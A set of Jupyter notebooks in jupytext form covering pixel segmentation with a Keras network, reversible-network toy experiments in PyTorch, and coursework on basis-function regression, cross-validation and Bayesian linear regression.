#note: I used 3 outputs instead of 1 (i.e. separate the r,g,b)
training_label=np.zeros([No_training_samples,3]);
for i in range(No_training_samples):
rx=int(random.random()*width);
ry=int(random.random()*height);
training_data[i]=img[ry,rx]/256;#normalise the data -> in range 0 to 1
if (img_label[ry,rx,0]>200): training_label[i][0]=1;
elif(img_label[ry,rx,1]>200):training_label[i][1]=1;
else:training_label[i][2]=1;
x_train=training_data;
y_train=training_label;
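# A vectorized alternative to the sampling loop above; a sketch (the function name is mine, and it assumes HxWx3 uint8 arrays like `img`/`img_label`):

```python
import numpy as np

def sample_training_pixels(img, img_label, n, seed=0):
    # draw n random pixel positions at once instead of looping
    rng = np.random.default_rng(seed)
    h, w = img.shape[:2]
    ys = rng.integers(0, h, n); xs = rng.integers(0, w, n)
    data = img[ys, xs] / 256.0           # normalise to [0, 1)
    labels = np.zeros((n, 3))
    red = img_label[ys, xs, 0] > 200
    green = img_label[ys, xs, 1] > 200
    labels[red, 0] = 1                   # red-labelled pixels -> class 0
    labels[~red & green, 1] = 1          # green-labelled -> class 1
    labels[~red & ~green, 2] = 1         # everything else -> class 2
    return data, labels
```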
# + colab={"base_uri": "https://localhost:8080/"} id="5c6P-5JkU599" outputId="b70f458c-0bcc-4d5c-bde0-0730b9df7ed1"
#Build the ANN model
model=Sequential() #a model with a series of layers
model.add(Dense(units=1600, activation='relu', input_shape=(3,)))
model.add(Dense(units=1600,activation='relu'))
model.add(Dense(units=3, activation='softmax'))
model.summary() #show the model summary
#compile the model (Keras uses the RMSprop optimizer by default; made explicit here)
model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])
# + colab={"base_uri": "https://localhost:8080/"} id="XxOcLBROWvcw" outputId="40a118d6-4f8c-4dfe-9a55-3301e28deb4f"
#train the model
history=model.fit(x_train,y_train,epochs=3,verbose=1)
# + id="2zDvnirGaBEn"
#show inference results
def ANN_Segmentation():
    #prepare the validation set (use the test image's own size, which may differ from the training image)
    test_h=img_test.shape[0];test_w=img_test.shape[1];
    validateset=np.zeros([test_w*test_h,3]);
    j=0;
    for y in range(test_h):
        for x in range(test_w):
            validateset[j]=img_test[y,x]/256;
            j+=1;
    prediction=model.predict(validateset);#perform model prediction
    resultimg=img_test.copy(); j=0;
    for y in range(test_h):
        for x in range(test_w):
            outputlayer=prediction[j];
            j+=1;
            if (outputlayer[0]>=outputlayer[1] and outputlayer[0]>=outputlayer[2]):
                resultimg[y,x,0]=255;resultimg[y,x,1]=0;resultimg[y,x,2]=0;
            elif (outputlayer[1]>outputlayer[0] and outputlayer[1]>=outputlayer[2]):
                resultimg[y,x,1]=255;resultimg[y,x,0]=0;resultimg[y,x,2]=0;
            else: resultimg[y,x,2]=255;resultimg[y,x,1]=0;resultimg[y,x,0]=0;
    return resultimg;
# + colab={"base_uri": "https://localhost:8080/", "height": 511} id="7pCPbeakaDMO" outputId="f2a34965-2e21-4d16-f070-969d2b661d5b"
resultimg=ANN_Segmentation();#segment the image with ANN
#show the results
plt.imshow(img_test);plt.title('original');plt.axis('off');plt.show();
plt.imshow(resultimg);plt.title('segmented');plt.axis('off');plt.show()
| ANN_with_TensorFlow.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import logging
import importlib
importlib.reload(logging) # see https://stackoverflow.com/a/21475297/1469195
log = logging.getLogger()
log.setLevel('INFO')
import sys
logging.basicConfig(format='%(asctime)s %(levelname)s : %(message)s',
level=logging.INFO, stream=sys.stdout)
# +
# %%capture
import os
import site
os.sys.path.insert(0, '/home/schirrmr/code/reversible/')
os.sys.path.insert(0, '/home/schirrmr/braindecode/code/braindecode/')
os.sys.path.insert(0, '/home/schirrmr/code/explaining/reversible//')
# %load_ext autoreload
# %autoreload 2
import numpy as np
import logging
log = logging.getLogger()
log.setLevel('INFO')
import sys
logging.basicConfig(format='%(asctime)s %(levelname)s : %(message)s',
level=logging.INFO, stream=sys.stdout)
import matplotlib
from matplotlib import pyplot as plt
from matplotlib import cm
# %matplotlib inline
# %config InlineBackend.figure_format = 'png'
matplotlib.rcParams['figure.figsize'] = (12.0, 1.0)
matplotlib.rcParams['font.size'] = 14
import seaborn
seaborn.set_style('darkgrid')
from reversible2.sliced import sliced_from_samples
from numpy.random import RandomState
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import copy
import math
import itertools
import torch as th
from braindecode.torch_ext.util import np_to_var, var_to_np
from reversible2.splitter import SubsampleSplitter
from reversible2.view_as import ViewAs
from reversible2.invert import invert
from reversible2.affine import AdditiveBlock
from reversible2.plot import display_text, display_close
# +
import sklearn.datasets
X,y = sklearn.datasets.make_moons(20, shuffle=False, noise=1e-4)
train_inputs = np_to_var(X[0:10:2], dtype=np.float32)
val_inputs = np_to_var(X[1:10:2], dtype=np.float32)
cuda = False
test_X = sklearn.datasets.make_moons(200, shuffle=False, noise=1e-4)[0][:100:2]
test_inputs = np_to_var(test_X, dtype=np.float32)
plt.figure(figsize=(4,4))
plt.scatter(var_to_np(test_inputs)[:,0], var_to_np(test_inputs)[:,1],
color=seaborn.color_palette()[2], alpha=0.5, s=5)
plt.scatter(var_to_np(train_inputs)[:,0], var_to_np(train_inputs)[:,1])
plt.scatter(var_to_np(val_inputs)[:,0], var_to_np(val_inputs)[:,1])
# +
cuda = False
from reversible2.distribution import TwoClassIndependentDist
from reversible2.blocks import dense_add_block
from reversible2.rfft import RFFT, Interleave
from reversible2.util import set_random_seeds
from torch.nn import ConstantPad2d
import torch as th
from reversible2.splitter import SubsampleSplitter
from matplotlib.patches import Ellipse
from reversible2.gaussian import get_gauss_samples
set_random_seeds(2019011641, cuda)
model = nn.Sequential(
dense_add_block(2,200),
dense_add_block(2,200),
dense_add_block(2,200),
dense_add_block(2,200),
)
dist = TwoClassIndependentDist(2, truncate_to=None)
tr_log_stds = th.zeros_like(train_inputs).requires_grad_(True)
tr_log_stds.data[:] -= 2
from reversible2.model_and_dist import ModelAndDist
model_and_dist = ModelAndDist(model, dist)
optim = th.optim.Adam([{'params': model_and_dist.dist.parameters(), 'lr':1e-2},
{'params': list(model_and_dist.model.parameters()),
'lr': 1e-4}])
optim_stds = th.optim.Adam([{'params': [tr_log_stds], 'lr':1e-2},])
# -
from reversible2.gaussian import get_gaussian_log_probs
in_mean = invert(model_and_dist.model, model_and_dist.dist.get_mean_std(0)[0].unsqueeze(0),).detach()
valid_nll = -get_gaussian_log_probs(in_mean, th.ones_like(in_mean), val_inputs)
valid_nll
# +
from reversible2.invert import invert
n_epochs = 10001
rand_noise_factor = 1e-2
for i_epoch in range(n_epochs):
nll = -th.mean(model_and_dist.get_total_log_prob(0, train_inputs + (th.rand_like(train_inputs) -0.5) * 1e-2))
optim.zero_grad()
nll.backward()
optim.step()
if i_epoch % (n_epochs // 20) == 0:
tr_out = model_and_dist.model(train_inputs)
va_out = model_and_dist.model(val_inputs)
te_out = model_and_dist.model(test_inputs)
demeaned = va_out.unsqueeze(1) - tr_out.unsqueeze(0)
rescaled = demeaned / th.exp(tr_log_stds).unsqueeze(0)
eps = 1e-8
log_probs = -(rescaled **2) / 2 - np.log(float(np.sqrt(2 * np.pi))) - tr_log_stds.unsqueeze(0)
# sum over dimensions
log_probs = th.sum(log_probs, dim=-1)
probs = th.exp(log_probs)
probs = th.mean(probs, dim=1)
log_probs = th.log(probs + eps)
fig = plt.figure(figsize=(5,5))
mean, std = model_and_dist.dist.get_mean_std(0)
plt.plot(var_to_np(te_out)[:,0], var_to_np(te_out)[:,1], color=seaborn.color_palette()[1])
plt.scatter(var_to_np(tr_out)[:,0], var_to_np(tr_out)[:,1], color=seaborn.color_palette()[0])
plt.scatter(var_to_np(va_out)[:,0], var_to_np(va_out)[:,1], color=seaborn.color_palette()[2])
for lprob, out in zip(log_probs, va_out):
plt.annotate("{:.1E}".format(-lprob.item()), var_to_np(out))
ellipse = Ellipse(var_to_np(mean), var_to_np(std[0]), var_to_np(std[1]), edgecolor='black', facecolor='None')
ax = plt.gca()
ax.add_artist(ellipse)
for out, lstd in zip(tr_out, tr_log_stds):
ellipse = Ellipse(var_to_np(out), var_to_np(th.exp(lstd)[0]), var_to_np(th.exp(lstd)[1]),
edgecolor='blue', facecolor='None')
ax.add_artist(ellipse)
plt.title("Epoch {:d} of {:d}\nTrain NLL {:.1E}\nValid NLL {:.1E}\nTest NLL {:.1E}\n"
"ValidMixNLL {:.1E}\n".format(
i_epoch, n_epochs,
-th.mean(model_and_dist.get_total_log_prob(0, train_inputs)).item(),
-th.mean(model_and_dist.get_total_log_prob(0, val_inputs)).item(),
-th.mean(model_and_dist.get_total_log_prob(0, test_inputs)).item(),
-th.mean(log_probs).item(),
))
plt.axis('equal')
display_close(fig)
examples = model_and_dist.get_examples(0,200)
fig = plt.figure(figsize=(5,5))
plt.plot(var_to_np(test_inputs)[:,0], var_to_np(test_inputs)[:,1], color=seaborn.color_palette()[2])
plt.scatter(var_to_np(examples)[:,0], var_to_np(examples)[:,1], color=seaborn.color_palette()[1])
plt.scatter(var_to_np(train_inputs)[:,0], var_to_np(train_inputs)[:,1], color=seaborn.color_palette()[0])
radians = np.linspace(0,2*np.pi,24)
circle_points = np.stack([np.cos(radians), np.sin(radians)], axis=-1)
circle_th = np_to_var(circle_points, device=train_inputs.device, dtype=np.float32)
stds = th.exp(tr_log_stds)
circles_per_point = tr_out.unsqueeze(1) + (circle_th.unsqueeze(0) * stds.unsqueeze(1))
in_circles = invert(model_and_dist.model, circles_per_point.view(-1, circles_per_point.shape[-1]))
in_circles = in_circles.view(circles_per_point.shape)
for c in var_to_np(in_circles):
plt.plot(c[:,0], c[:,1],color=seaborn.color_palette()[0],
alpha=1, lw=1)
plt.axis('equal')
plt.title("Input space")
plt.legend(("Test", "Fake","Train", ),)
display_close(fig)
| notebooks/toy-1d-2d-examples/.ipynb_checkpoints/GaussVsModelled-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Let us have a look at a more interesting data set
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
N = 25
X = np.linspace(0,0.9,N).reshape(N,1)
# +
def f(x):
    return np.cos(10*x**2) + 0.1*np.sin(100*x)
y = f(X)
plt.figure()
plt.plot(X, y, '+')
plt.xlabel("$x$")
plt.ylabel("$y$");
# -
# ## A)
# ## For polynomial of degree K
def poly_features(X, K):
#X: inputs of size N x 1
#K: degree of the polynomial
# computes the feature matrix Phi (N x (K+1))
X = X.flatten()
N = X.shape[0]
#initialize Phi
Phi = np.zeros((N, K+1))
# Compute the feature matrix in stages
Phi = np.zeros((N, K+1))
for i in range(len(X)):
for j in range(K+1):
Phi[i,j] = X[i]**(j) ## <-- EDIT THIS LINE
return Phi
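# The same feature matrix can be built in a single call; a sketch using `np.vander` rather than the assignment's explicit loop:

```python
import numpy as np

def poly_features_vander(X, K):
    # columns are 1, x, x**2, ..., x**K (increasing powers)
    return np.vander(np.asarray(X).flatten(), K + 1, increasing=True)
```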
def nonlinear_features_maximum_likelihood(Phi, y):
# Phi: features matrix for training inputs. Size of N x D
# y: training targets. Size of N by 1
# returns: maximum likelihood estimator theta_ml. Size of D x 1
    jitter = 0 # can be set to a small positive ridge term for numerical stability
    K = Phi.shape[1]
    # maximum likelihood estimate via the normal equations
    w_ml = np.linalg.inv(Phi.T @ Phi + jitter * np.eye(K,K)) @ (Phi.T @ y)
return w_ml
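# Numerically, a least-squares solver is usually preferred to forming the explicit inverse; a sketch of that alternative:

```python
import numpy as np

def maximum_likelihood_lstsq(Phi, y):
    # solves min ||Phi w - y||^2 without computing (Phi^T Phi)^-1
    w_ml, *_ = np.linalg.lstsq(Phi, y, rcond=None)
    return w_ml
```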
# test inputs
Xtest = np.linspace(-0.3,1.3,200).reshape(-1,1)
for k in range(12):
#training part
# k is the degree of the polynomial we wish to fit
Phi = poly_features(X, k) # N x (K+1) feature matrix
w_ml = nonlinear_features_maximum_likelihood(Phi, y) # maximum likelihood estimator
# testing part
Phi_test = poly_features(Xtest, k) # N x (K+1) feature matrix
mean_pred = Phi_test @ w_ml # predicted y-values
plt.figure()
plt.plot(X, y, '+')
plt.plot(Xtest, mean_pred)
plt.xlabel("$x$")
plt.ylabel("$y$")
plt.legend(["data", "maximum likelihood fit with k = {}".format(k)]);
plt.ylim([-3,3])
# ## For trigonometric of degree K with unit frequency
def trigo_features(X, K):
    #X: inputs of size N x 1
    #K: number of sine/cosine frequency pairs
    # computes the feature matrix Phi (N x (2K+1)):
    # columns are [1, sin(2*pi*x), cos(2*pi*x), ..., sin(2*pi*K*x), cos(2*pi*K*x)]
    X = X.flatten()
    N = X.shape[0]
    #initialize Phi (the first column stays 1 for the bias term)
    Phi = np.ones((N, 2*K+1))
    for i in range(N):
        for j in range(1,K+1):
            Phi[i,2*j] = np.cos(2*np.pi*j*X[i])
            Phi[i,2*j-1] = np.sin(2*np.pi*j*X[i])
return Phi
# test inputs
Xtest = np.linspace(-0.3,1.3,200).reshape(-1,1)
for k in range(12):
#training part
# k is the degree of the polynomial we wish to fit
Phi = trigo_features(X, k) # N x (K+1) feature matrix
w_ml = nonlinear_features_maximum_likelihood(Phi, y) # maximum likelihood estimator
# testing part
Phi_test = trigo_features(Xtest, k) # N x (K+1) feature matrix
mean_pred = Phi_test @ w_ml # predicted y-values
plt.figure()
plt.plot(X, y, '+')
plt.plot(Xtest, mean_pred)
plt.xlabel("$x$")
plt.ylabel("$y$")
plt.legend(["data", "maximum likelihood fit with k = {}".format(k)]);
plt.ylim([-3,3])
# ## b)
# ## repeat the previous part
# test inputs
Xtest = np.linspace(-1,1.2,200).reshape(-1,1)
for k in range(12):
#training part
# k is the degree of the polynomial we wish to fit
Phi = trigo_features(X, k) # N x (K+1) feature matrix
w_ml = nonlinear_features_maximum_likelihood(Phi, y) # maximum likelihood estimator
# testing part
Phi_test = trigo_features(Xtest, k) # N x (K+1) feature matrix
mean_pred = Phi_test @ w_ml # predicted y-values
plt.figure()
plt.plot(X, y, '+')
plt.plot(Xtest, mean_pred)
plt.xlabel("$x$")
plt.ylabel("$y$")
plt.legend(["data", "maximum likelihood fit with k = {}".format(k)]);
plt.ylim([-3,3])
def RMSE(y, ypred):
    # root-mean-square error (note the square root)
    rmse = np.sqrt(np.mean((y - ypred)**2))
    return rmse
# +
K_max = 10
rmse_train = np.zeros((K_max+1,))
sigma = np.zeros((K_max+1,))
for k in range(K_max+1):
    Phi = poly_features(X, k)
    w_ml = nonlinear_features_maximum_likelihood(Phi, y)
    y_pred = Phi @ w_ml  # predictions on the training inputs
    rmse_train[k] = RMSE(y, y_pred)
#sigma = y_pred/(X.shape[0])
#plt.plot(sigma)
plt.figure()
plt.plot(rmse_train)
plt.xlabel("degree of polynomial")
plt.ylabel("RMSE");
# -
def leave_one_out(X):
    # return a list of N arrays, each with one observation held out
    data = list(X)
    result = []
    for i in range(len(data)):
        result.append(np.array(data[:i] + data[i+1:]))
    return result
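# A quick standalone demonstration of the leave-one-out splits, using slicing
# so that duplicate values are handled correctly:

```python
import numpy as np

def leave_one_out(X):
    # return a list of N arrays, each with one observation held out
    data = list(X)
    return [np.array(data[:i] + data[i+1:]) for i in range(len(data))]

folds = leave_one_out([10, 20, 30])
print(folds)  # three folds, each omitting one value
```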
# +
k=1
N = X.shape[0]
error = []
errors = []
X_folds = leave_one_out(X)
y_folds = leave_one_out(y)
for j in range(len(X_folds)):
    # training part: fit on all points except the j-th
    training_inputs = X_folds[j]
    training_targets = y_folds[j]
    Phi = trigo_features(training_inputs, k)  # (N-1) x (2k+1) feature matrix
    w_ml = nonlinear_features_maximum_likelihood(Phi, training_targets)  # maximum likelihood estimator
    # testing part: predict the held-out point
    Phi_test = trigo_features(X[j], k)  # 1 x (2k+1) feature matrix
mean_pred = Phi_test @ w_ml # predicted y-values
err = (y[j] - mean_pred)[0][0]
error.append(err*err )
errors.append(sum(error)/N)
# +
K_max = 10
rmse_train = np.zeros((K_max+1,))
sigma = np.zeros((K_max+1,))
errors = []
Xtest = np.linspace(-1,1.2,25).reshape(-1,1)
ytest = f(Xtest)
for k in range(K_max+1):
#train
Phi = trigo_features(X, k)
w_ml = nonlinear_features_maximum_likelihood(Phi, y)
#test
Phi_test = trigo_features(Xtest, k)
#w_ml = nonlinear_features_maximum_likelihood(Phi_test, ytest)
y_pred = Phi @ w_ml
# prediction (test set)
#ypred_test = Phi_test @ w_ml
    rmse_train[k] = RMSE(y, y_pred)
###########################################################
N = X.shape[0]
error = []
    X_folds = leave_one_out(X)
    y_folds = leave_one_out(y)
    for j in range(len(X_folds)):
        # training part: fit on all points except the j-th
        training_inputs = X_folds[j]
        training_targets = y_folds[j]
        Phi = trigo_features(training_inputs, k)  # (N-1) x (2k+1) feature matrix
        w_ml = nonlinear_features_maximum_likelihood(Phi, training_targets)  # maximum likelihood estimator
        # testing part: predict the held-out point
        Phi_test = trigo_features(X[j], k)  # 1 x (2k+1) feature matrix
mean_pred = Phi_test @ w_ml # predicted y-values
err = (y[j] - mean_pred)[0][0]
error.append(err*err )
errors.append(sum(error)/N)
errors = np.array(errors)
#print(errors)
plt.figure()
plt.plot(errors)
plt.plot(rmse_train)
plt.xlabel("degree of polynomial")
plt.ylabel("MSE")
plt.legend(["LOOCV error", "training error"]);
# -
t=[j for j in range(25)]
leav=leave_one_out(t)
def Gaussian_features(X, K):
    # X: inputs of size N x 1
    # K+1: number of Gaussian basis functions
    # computes the feature matrix Phi (N x (K+1))
    X = X.flatten()
    mu = np.linspace(0, 1, K+1).reshape(-1, 1)  # basis-function centres
    scale = 0.1
    N = X.shape[0]
    # initialize Phi
    Phi = np.zeros((N, K+1))
    # fill in the Gaussian (RBF) features
    for i in range(len(X)):
        for j in range(K+1):
            Phi[i, j] = np.exp(-((X[i] - mu[j])**2) / (2*scale**2))
    return Phi
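# A standalone sanity check (vectorized for brevity): evaluated exactly at its
# own centre, each Gaussian basis function equals 1, so evaluating the feature
# map at the centres gives a matrix with a unit diagonal.

```python
import numpy as np

def gaussian_features(X, K, scale=0.1):
    # standalone RBF feature map with K+1 centres on [0, 1]
    X = np.asarray(X, dtype=float).flatten()
    mu = np.linspace(0, 1, K + 1)
    return np.exp(-((X[:, None] - mu[None, :]) ** 2) / (2 * scale ** 2))

K = 4
mu = np.linspace(0, 1, K + 1)
Phi = gaussian_features(mu, K)       # evaluate exactly at the centres
print(np.allclose(np.diag(Phi), 1))  # True: each basis peaks at its centre
```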
def loss_function(w_map, lamda):
    # regularized least-squares loss; note: reads the globals Phi and y
    value = np.linalg.norm(y - (Phi @ w_map))**2 + lamda*(np.linalg.norm(w_map)**2)
    return value
def nonlinear_features_maximum_a_posteriori(Phi, y, lamda):
    # Phi: feature matrix for training inputs. Size N x D
    # y: training targets. Size N x 1
    # returns: MAP (ridge-regression) estimator w_map. Size D x 1
    D = Phi.shape[1]
    # solve the regularized normal equations (more stable than an explicit inverse)
    w_map = np.linalg.solve(Phi.T @ Phi + lamda * np.eye(D), Phi.T @ y)
    return w_map
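# With a Gaussian prior and Gaussian likelihood, the MAP estimate is exactly
# the ridge-regression solution, i.e. it satisfies the regularized normal
# equations (Phi^T Phi + lambda I) w = Phi^T y. A standalone check on random data:

```python
import numpy as np

rng = np.random.default_rng(0)
Phi = rng.normal(size=(25, 6))
y = rng.normal(size=(25, 1))
lamda = 0.5

# ridge/MAP closed form, as in the function above
w_map = np.linalg.solve(Phi.T @ Phi + lamda * np.eye(6), Phi.T @ y)

# w_map must satisfy the regularized normal equations
lhs = (Phi.T @ Phi + lamda * np.eye(6)) @ w_map
rhs = Phi.T @ y
print(np.allclose(lhs, rhs))  # True
```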
# +
#lamdas = np.random.rand(3)
lamdas = [1e-12, 1, 50]
Xtest = np.linspace(-0.3,1.3,200).reshape(-1,1)
for lamda in lamdas :
K = 20
rsf = np.zeros(K+1)
#for k in range(K):
Phi = Gaussian_features(X, K)
w_map = nonlinear_features_maximum_a_posteriori(Phi, y, lamda)
Phi_test = Gaussian_features(Xtest, K)
y_pred = Phi_test @ w_map
plt.plot(Xtest, y_pred)
plt.ylim([-1.2,2])
#rsf[k] = loss_function(w_map, lamda)
plt.plot(X,y, '+')
# +
#lamdas = np.random.rand(3)
lamdas = [0.4, 1, 9]
for lamda in lamdas :
K = 20
rsf = np.zeros(K+1)
for k in range(K):
Phi = Gaussian_features(X, k)
w_map = nonlinear_features_maximum_a_posteriori(Phi, y, lamda)
rsf[k] = loss_function(w_map, lamda)
#rsf = np.array(rsf)
#print(rsf.shape)
plt.figure()
plt.plot(rsf)
plt.xlabel("w")
#plt.ylabel("")
    plt.legend([r"$\lambda$ = {}".format(lamda)]);
# -
# ## 3) Bayesian Linear Regression
def lml(alpha, beta, Phi, Y):
    # log marginal likelihood with prior variance alpha and noise variance beta
    N = Y.shape[0]
    A = alpha * (Phi @ Phi.T) + beta * np.eye(N)
    A_inv = np.linalg.inv(A + 1e-08 * np.eye(N))
    lml = (-N * np.log(2*np.pi)
           - np.log(abs(np.linalg.det(A)))
           - Y.T @ (A_inv @ Y)) / 2
    return lml
# +
# randomly initialize a value to x
N = 25
X = np.linspace(0,0.9,N).reshape(N,1)
Y = f(X)
Phi = poly_features(X, 1)
lml(0.1, 0.1, Phi, Y)
# -
def grad_lml(alpha, beta, Phi, Y):
    # analytic gradient of lml with respect to alpha and beta
    N = Y.shape[0]
    A = alpha * (Phi @ Phi.T) + beta * np.eye(N)
    A_inv = np.linalg.inv(A)
    alpha_grad = (Y.T @ (A_inv @ Phi @ Phi.T @ A_inv @ Y)
                  - np.trace(A_inv @ Phi @ Phi.T)) / 2
    beta_grad = (Y.T @ (A_inv @ A_inv) @ Y - np.trace(A_inv)) / 2
    return (alpha_grad, beta_grad)
grad_lml(0.1, 0.1, Phi, Y)
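# The analytic gradient can be verified against central finite differences of
# the objective. This is a standalone sketch with its own copies of lml and
# grad_lml and randomly generated Phi and Y:

```python
import numpy as np

def lml(alpha, beta, Phi, Y):
    # standalone copy of the log marginal likelihood
    N = Y.shape[0]
    A = alpha * (Phi @ Phi.T) + beta * np.eye(N)
    return float((-N * np.log(2 * np.pi)
                  - np.log(abs(np.linalg.det(A)))
                  - Y.T @ np.linalg.solve(A, Y)) / 2)

def grad_lml(alpha, beta, Phi, Y):
    # standalone copy of the analytic gradient
    N = Y.shape[0]
    A = alpha * (Phi @ Phi.T) + beta * np.eye(N)
    A_inv = np.linalg.inv(A)
    g_alpha = float((Y.T @ A_inv @ Phi @ Phi.T @ A_inv @ Y
                     - np.trace(A_inv @ Phi @ Phi.T)) / 2)
    g_beta = float((Y.T @ A_inv @ A_inv @ Y - np.trace(A_inv)) / 2)
    return g_alpha, g_beta

rng = np.random.default_rng(1)
Phi = rng.normal(size=(10, 2))
Y = rng.normal(size=(10, 1))
a, b, eps = 0.3, 0.7, 1e-6

# central finite differences of lml in each coordinate
fd_alpha = (lml(a + eps, b, Phi, Y) - lml(a - eps, b, Phi, Y)) / (2 * eps)
fd_beta = (lml(a, b + eps, Phi, Y) - lml(a, b - eps, Phi, Y)) / (2 * eps)
g_alpha, g_beta = grad_lml(a, b, Phi, Y)
print(g_alpha, fd_alpha)  # analytic and numeric gradients should agree
print(g_beta, fd_beta)
```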
# +
# set up a stepsize
learning_rate = 0.01
# randomly initialize a value to X
N = 25
X = np.linspace(0,0.9,N).reshape(N,1)
Y = f(X)
Phi = poly_features(X, 1)
np.random.seed(4)
previous_alpha = np.random.rand(1)
previous_beta = np.random.rand(1)
# set up a number of iteration
epoch = 1000
# +
def gradient_descend(previous_alpha, previous_beta, learning_rate, epoch):
    # Gradient ascent on the objective lml(alpha, beta, Phi, Y),
    # using the analytic gradient grad_lml(alpha, beta, Phi, Y).
    iters = 0
    previous_step_size = 1
    precision = 0.00001
    Alpha = np.zeros(epoch)
    Beta = np.zeros(epoch)
    log_marg_lik = np.zeros(epoch, dtype=float)
    # iterate until the step size is small enough or the budget runs out
    while (previous_step_size > precision) and (iters < epoch):
        grad = grad_lml(previous_alpha, previous_beta, Phi, Y)
        current_alpha = previous_alpha + learning_rate*grad[0]
        current_beta = previous_beta + learning_rate*grad[1]
        Alpha[iters] = current_alpha
        Beta[iters] = current_beta
        previous_step_size = max(abs(current_alpha - previous_alpha),
                                 abs(current_beta - previous_beta))
        # update previous_alpha and previous_beta
        previous_alpha = current_alpha
        previous_beta = current_beta
        iters += 1
    # keep only the iterations actually performed
    Alpha = Alpha[:iters]
    Beta = Beta[:iters]
    log_marg_lik = log_marg_lik[:iters]
    for i in range(iters):
        log_marg_lik[i] = lml(Alpha[i], Beta[i], Phi, Y)[0][0]
    alpha_max = Alpha[log_marg_lik.argmax()]
    beta_max = Beta[log_marg_lik.argmax()]
    print(alpha_max, beta_max)
    return (Alpha, Beta, log_marg_lik)
# -
Alpha, Beta, log_marg_lik = gradient_descend(previous_alpha, previous_beta, learning_rate, epoch)
# +
#log_marg_lik = np.zeros(epoch).astype('float')
# for i in range(epoch):
# log_marg_lik[i] = lml(Alpha[i], Beta[i], Phi, Y)[0][0]
plt.figure()
plt.plot(log_marg_lik)
plt.xlabel("Number of iterations")
plt.ylabel("y")
# -
Alpha, Beta, log_marg_lik = gradient_descend(previous_alpha, previous_beta, learning_rate, epoch)
# +
import matplotlib.pyplot as plt
from matplotlib import animation
from mpl_toolkits.mplot3d import Axes3D
# -
np.random.seed(4)
# randomly initialize values
alpha = 1
beta = 1
learning_rate = 0.01
epoch = 500
alpha_gd, beta_gd, lml_gd = gradient_descend(alpha, beta, learning_rate, epoch)
alpha_max = alpha_gd[np.array(lml_gd).argmax()]
beta_max = beta_gd[np.array(lml_gd).argmax()]
print(alpha_max, beta_max)
# +
''' Plot our function '''
N = 150
a = np.linspace(0.001,1,N).reshape(N,1)
b = np.linspace(0.001,1,N).reshape(N,1)
x, y = np.meshgrid(a, b)
n = x.shape
z = np.zeros(n)
for i in range(n[0]):
for j in range(n[0]):
z[i,j] = max(lml(x[i,j], y[i,j], Phi, Y), -30)
fig1, ax1 = plt.subplots()
#ax1.contour(x, y, z, levels=np.logspace(-3, 3, N), cmap='jet')
ax1.contour(x, y, z, cmap='jet', levels=np.linspace(np.min(z), np.max(z), 28))
# Plot target (the minimum of the function)
#min_point = np.array([0., 0.])
#max_point = np.array([alpha_max,beta_max])
#max_point_ = max_point[:, np.newaxis]
#print(max_point_)
#min_point_ = min_point[np.newaxis,:]
#ax1.plot(alpha_max, beta_max, 'r*', markersize=10)
#ax1.plot(*max_point_, lml(x[i,j], y[i,j], Phi, Y), 'r*', markersize=10)
ax1.set_xlabel(r'$\alpha$')
ax1.set_ylabel(r'$\beta$')
# #%matplotlib inline
alpha_gd = np.array(alpha_gd)
beta_gd = np.array(beta_gd)
ax1.plot(alpha_gd, beta_gd, 'bo')
for i in range(1, epoch):
ax1.annotate('', xy=(alpha_gd[i], beta_gd[i]), xytext=(alpha_gd[i-1], beta_gd[i-1]),
arrowprops={'arrowstyle': '->', 'color': 'r', 'lw': 1},
va='center', ha='center')
plt.ylim(0, 1)
plt.xlim(0, 1)
plt.show()
#*min_point_, func_z(*min_point_)
# +
## alpha_gd, beta_gd, lml_gd = gradient_decent(alpha, beta, learning_rate, epoch)
# -
# ## C)
# +
# set up a stepsize
learning_rate = 0.01
# randomly initialize a value to X
N = 25
X = np.linspace(0,0.9,N).reshape(N,1)
Y = f(X)
Phi = poly_features(X, 1)
np.random.seed(4)
previous_alpha = np.random.rand(1)
previous_beta = np.random.rand(1)
# set up a number of iteration
epoch = 1000
# -
Kmax = 11
max_values = []
#learning_rate = 1e-7
for i in range(Kmax+1):
    Phi = trigo_features(X, i)
    Alpha, Beta, log_marg_lik = gradient_descend(previous_alpha, previous_beta, learning_rate, epoch)
    max_values.append(max(log_marg_lik))
print(max_values)
max_values = np.array(max_values)
orders = np.array([order for order in range(Kmax+1)])
plt.figure()
plt.plot(orders, max_values)
plt.xlabel("order of basis function")
plt.ylabel("maximum of the lml")
max_values
Phi = trigo_features(X, 2)
Alpha, Beta, log_marg_lik = gradient_descend(previous_alpha, previous_beta, learning_rate, epoch)
alpha_max = Alpha[log_marg_lik.argmax()]
beta_max = Beta[log_marg_lik.argmax()]
print(lml(alpha_max, beta_max, Phi, Y)[0][0])
def Gaussian_features(X, K):
    # X: inputs of size N x 1
    # K+1: number of Gaussian basis functions
    # computes the feature matrix Phi (N x (K+1))
    X = X.flatten()
    mu = np.linspace(-0.5, 1, K+1).reshape(-1, 1)  # one centre per basis function
    scale = 0.1
    N = X.shape[0]
    # initialize Phi
    Phi = np.zeros((N, K+1))
    # fill in the Gaussian (RBF) features
    for i in range(len(X)):
        for j in range(K+1):
            Phi[i, j] = np.exp(-((X[i] - mu[j])**2) / (2*scale**2))
    return Phi
# +
K =10
alpha = 1
beta = 0.1
Phi = Gaussian_features(X,K)
# N = 25
variance = np.linalg.inv(1/alpha*np.identity(K+1) + 1/beta*Phi.T @ Phi)
mean = variance @ (1/beta* Phi.T @ y).flatten()
sample = np.random.multivariate_normal(mean,variance, size=5)
Phi_test = Gaussian_features(Xtest, K)
for i in range(5):
y_pred = Phi_test @ sample[i]
plt.plot(Xtest, y_pred)
# plot the posterior
# plt.figure()
# plt.plot(X, y, "+")
# plt.plot(Xtest, m_mle_test)
# plt.plot(Xtest, m_map_test)
mean_blr = Phi_test @ mean
cov_blr = Phi_test @ variance @ Phi_test.T
var_blr = np.diag(cov_blr)
conf_bound1 = np.sqrt(var_blr).flatten()
conf_bound2 = 2.0*np.sqrt(var_blr).flatten()
